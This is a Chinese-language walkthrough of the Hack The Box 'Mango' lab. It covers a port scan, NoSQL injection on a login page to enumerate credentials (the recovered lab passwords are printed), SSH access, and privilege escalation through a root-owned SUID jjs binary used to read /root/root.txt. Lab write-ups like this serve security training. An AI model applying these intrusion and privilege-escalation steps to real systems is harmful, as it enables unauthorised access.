image.png
image.png

不知道为啥,做了这几个里面这个超级卡,基本没啥反应的那种

nmap 扫描端口

image.png
image.png

同时发现了一个网址:在 443 端口 staging-order.mango.htb

vim /etc/hosts,把 10.10.10.162 staging-order.mango.htb

image.png
image.png

访问得到一个登录框

image.png
image.png

nosql 注入

先了解一些 mangodb 在 web 知识库补充

有个专门爆破用户名和密码的脚本:https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration

image.png
image.png

太慢了,就直接用大佬的结果了
mango:h3mXK8RhU~f{]f5H
admin:t9KcS3>!0B#2

可以直接用 ssh 登录到 ssh mango@10.10.10.162

image.png
image.png

su admin 切换到 admin 用户

在 admin 的目录下面找到 user.txt

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
可以发现 jjs 是用 root 运行的

运行 jjs
这样输入:

1
2
3
4
5
6
7
var filename = "/root/root.txt";
var content = new java.lang.String(
                   java.nio.file.Files.readAllBytes(
                     java.nio.file.Paths.get(filename)
                   )
                 );
print(content)

就可以拿到 root.txt

实在是佩服这个网,连不上,不截图了,也没发交 flag 了 Orz

参考:https://rmccarth.info/post/htb/mango/